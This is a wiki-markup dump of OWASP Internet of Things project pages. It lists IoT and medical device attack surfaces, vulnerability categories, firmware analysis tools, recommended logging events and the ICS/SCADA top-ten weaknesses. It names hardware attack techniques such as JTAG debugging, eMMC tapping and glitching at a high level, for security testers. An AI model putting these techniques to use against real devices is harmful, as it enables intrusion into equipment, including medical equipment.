* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:OWASP-IoT-Top-10-2018-final.pdf&diff=246175File:OWASP-IoT-Top-10-2018-final.pdf2018-12-19T23:16:21Z<p>Aaron.guzman: </p>
<hr />
<div>IoT Top 10 2018</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=File:2018_IoT_Top10.png&diff=246170File:2018 IoT Top10.png2018-12-19T23:07:43Z<p>Aaron.guzman: </p>
<hr />
<div>2018 IoT Top10</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246169OWASP Internet of Things Project2018-12-19T21:45:34Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Get Involved!==<br />
<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
